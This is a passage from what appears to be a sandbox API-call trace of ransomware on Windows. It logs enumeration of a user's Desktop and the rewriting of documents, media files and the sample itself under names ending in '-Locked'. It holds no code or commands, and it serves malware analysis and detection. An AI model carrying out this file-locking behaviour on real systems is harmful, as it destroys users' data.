ftLastAccessTime.dwLowDateTime=0x327b56d2, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327b56d2, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cx4Ag.doc-Locked", cAlternateFileName="CX4AG~1.DOC")) returned 1 [0304.540] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327c40db, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327c40db, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327c40db, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="d-a24dz0snVX.xlsx-Locked", cAlternateFileName="D-A24D~2.XLS")) returned 1 [0304.540] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327d17bd, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327d17bd, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327d17bd, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked", cAlternateFileName="DESKTO~1.INI")) returned 1 [0304.540] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327effc0, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327effc0, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327effc0, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="G2jIFnab-iHgfnotUdc.wav-Locked", cAlternateFileName="G2JIFN~2.WAV")) returned 1 [0304.541] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327fc3a2, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327fc3a2, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327fc3a2, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="h aXUsMO6g.png-Locked", cAlternateFileName="HAXUSM~2.PNG")) returned 1 [0304.541] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3280deae, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3280deae, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3280deae, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HElJnZ.bmp-Locked", cAlternateFileName="HELJNZ~1.BMP")) returned 1 [0304.542] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32818f84, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32818f84, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32818f84, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HhodZgzF8 9dLBFX.avi-Locked", cAlternateFileName="HHODZG~2.AVI")) returned 1 [0304.542] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32825171, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32825171, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32825171, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="iWyhboFMJLgPq_b7Ud9.avi-Locked", cAlternateFileName="IWYHBO~2.AVI")) returned 1 [0304.542] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32830233, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32830233, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32830233, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IZrQfjN.m4a-Locked", cAlternateFileName="IZRQFJ~1.M4A")) returned 1 [0304.542] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32841392, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32841392, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32841392, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L0Cw.docx-Locked", cAlternateFileName="L0CW~2.DOC")) returned 1 [0304.543] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3284eac3, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3284eac3, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3284eac3, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L3CXAN4c0b0rw2-.mkv-Locked", cAlternateFileName="L3CXAN~2.MKV")) returned 1 [0304.543] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3285ad2f, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3285ad2f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3285ad2f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L_wFYu3lS.pptx-Locked", cAlternateFileName="L_WFYU~2.PPT")) returned 1 [0304.543] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3286843c, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3286843c, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3286843c, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MyZQDkF.mp3-Locked", cAlternateFileName="MYZQDK~1.MP3")) returned 1 [0304.543] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3287204a, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3287204a, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3287204a, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nRKT5nI-9Sno8sTzM1P5.wav-Locked", cAlternateFileName="NRKT5N~2.WAV")) returned 1 [0304.543] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3287d036, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3287d036, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3287d036, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OqWYTp.bmp-Locked", cAlternateFileName="OQWYTP~1.BMP")) returned 1 [0304.544] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3288a749, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3288a749, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3288a749, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SkBr_ODTO7.ppt-Locked", cAlternateFileName="SKBR_O~2.PPT")) returned 1 [0304.544] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32896a80, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32896a80, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32896a80, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SoNi.jpg-Locked", cAlternateFileName="SONI~1.JPG")) returned 1 [0304.544] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328add42, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328add42, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328add42, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sTLRgmy.flv-Locked", cAlternateFileName="STLRGM~1.FLV")) returned 1 [0304.544] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328c165b, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328c165b, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328c165b, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tmhBBPCr.mp4-Locked", cAlternateFileName="TMHBBP~1.MP4")) returned 1 [0304.544] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328d28c0, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328d28c0, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328d28c0, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TujlyxlbhAxVP9v1.mp4-Locked", cAlternateFileName="TUJLYX~2.MP4")) returned 1 [0304.545] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328e38e5, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328e38e5, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328e38e5, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="V0zO8w_tvkIQjvRX6KqC.jpg-Locked", cAlternateFileName="V0ZO8W~2.JPG")) returned 1 [0304.545] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328f37f9, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328f37f9, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328f37f9, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VL-8wX.png-Locked", cAlternateFileName="VL-8WX~1.PNG")) returned 1 [0304.545] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x329021a3, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x329021a3, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x329021a3, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WJV4 Vo51_-ctoxSde.gif-Locked", cAlternateFileName="WJV4VO~2.GIF")) returned 1 [0304.545] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32913273, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32913273, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32913273, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="y4hqqhoePb18-mRGw.pdf-Locked", cAlternateFileName="Y4HQQH~2.PDF")) returned 1 [0304.545] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0304.545] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0304.546] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af154) returned 1 [0304.546] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af160) returned 1 [0304.546] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\0aih45hu.jpg-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\0aih45hu.jpg-Locked-Locked-Locked", lpFilePart=0x0) returned 0x3f [0304.546] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\0aih45hu.jpg-Locked-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\0aih45hu.jpg-Locked-Locked-Locked-Locked", lpFilePart=0x0) returned 0x46 [0304.546] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0304.546] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\0aih45hu.jpg-Locked-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\0aih45hu.jpg-locked-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0304.571] GetFileType (hFile=0x49c) returned 0x1 [0304.571] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0304.571] GetFileType (hFile=0x49c) returned 0x1 [0304.574] CloseHandle (hObject=0x49c) returned 1 [0304.574] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\4-0bKIu_zvUdt.mkv-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\4-0bKIu_zvUdt.mkv-Locked-Locked-Locked", lpFilePart=0x0) returned 0x44 [0304.574] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\4-0bKIu_zvUdt.mkv-Locked-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\4-0bKIu_zvUdt.mkv-Locked-Locked-Locked-Locked", lpFilePart=0x0) returned 0x4b [0304.575] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0304.575] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\4-0bKIu_zvUdt.mkv-Locked-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\4-0bkiu_zvudt.mkv-locked-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0304.582] GetFileType (hFile=0x49c) returned 0x1 [0304.582] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0304.582] GetFileType (hFile=0x49c) returned 0x1 [0304.584] CloseHandle (hObject=0x49c) returned 1 [0304.585] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe", lpFilePart=0x0) returned 0x62 [0304.585] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-Locked", lpFilePart=0x0) returned 0x69 [0304.585] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0304.585] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0304.616] GetFileType (hFile=0x49c) returned 0x1 [0304.616] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0304.617] GetFileType (hFile=0x49c) returned 0x1 [0304.618] CloseHandle (hObject=0x49c) returned 1 [0304.621] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-Locked", lpFilePart=0x0) returned 0x69 [0304.621] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-Locked-Locked", lpFilePart=0x0) returned 0x70 [0304.621] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0304.622] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0304.639] GetFileType (hFile=0x49c) returned 0x1 [0304.639] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0304.639] GetFileType (hFile=0x49c) returned 0x1 [0304.641] CloseHandle (hObject=0x49c) returned 1 [0304.641] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\autorun.inf-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\autorun.inf-Locked", lpFilePart=0x0) returned 0x30 [0304.641] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\autorun.inf-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\autorun.inf-Locked-Locked", lpFilePart=0x0) returned 0x37 [0304.641] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0304.642] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\autorun.inf-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\autorun.inf-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0304.655] GetFileType (hFile=0x49c) returned 0x1 [0304.655] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0304.655] GetFileType (hFile=0x49c) returned 0x1 [0304.662] CloseHandle (hObject=0x49c) returned 1 [0304.662] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj-Locked", lpFilePart=0x0) returned 0x36 [0304.662] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj-Locked-Locked", lpFilePart=0x0) returned 0x3d [0304.663] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0304.663] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\bgqh9xm98-f_e sij-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0304.695] GetFileType (hFile=0x49c) returned 0x1 [0304.695] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0304.695] GetFileType (hFile=0x49c) returned 0x1 [0304.697] CloseHandle (hObject=0x49c) returned 1 [0304.698] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\csI0 APq22kpFx84um.doc-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\csI0 APq22kpFx84um.doc-Locked", lpFilePart=0x0) returned 0x3b [0304.698] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\csI0 APq22kpFx84um.doc-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\csI0 APq22kpFx84um.doc-Locked-Locked", lpFilePart=0x0) returned 0x42 [0304.698] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0304.699] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\csI0 APq22kpFx84um.doc-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\csi0 apq22kpfx84um.doc-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0304.730] GetFileType (hFile=0x49c) returned 0x1 [0304.731] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0304.731] GetFileType (hFile=0x49c) returned 0x1 [0304.735] CloseHandle (hObject=0x49c) returned 1 [0304.736] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\Cx4Ag.doc-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\Cx4Ag.doc-Locked", lpFilePart=0x0) returned 0x2e [0304.736] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\Cx4Ag.doc-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\Cx4Ag.doc-Locked-Locked", lpFilePart=0x0) returned 0x35 [0304.736] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0304.736] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\Cx4Ag.doc-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cx4ag.doc-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0304.744] GetFileType (hFile=0x49c) returned 0x1 [0304.744] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0304.744] GetFileType (hFile=0x49c) returned 0x1 [0304.746] CloseHandle (hObject=0x49c) returned 1 [0304.747] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d-a24dz0snVX.xlsx-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d-a24dz0snVX.xlsx-Locked", lpFilePart=0x0) returned 0x36 [0304.747] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d-a24dz0snVX.xlsx-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d-a24dz0snVX.xlsx-Locked-Locked", 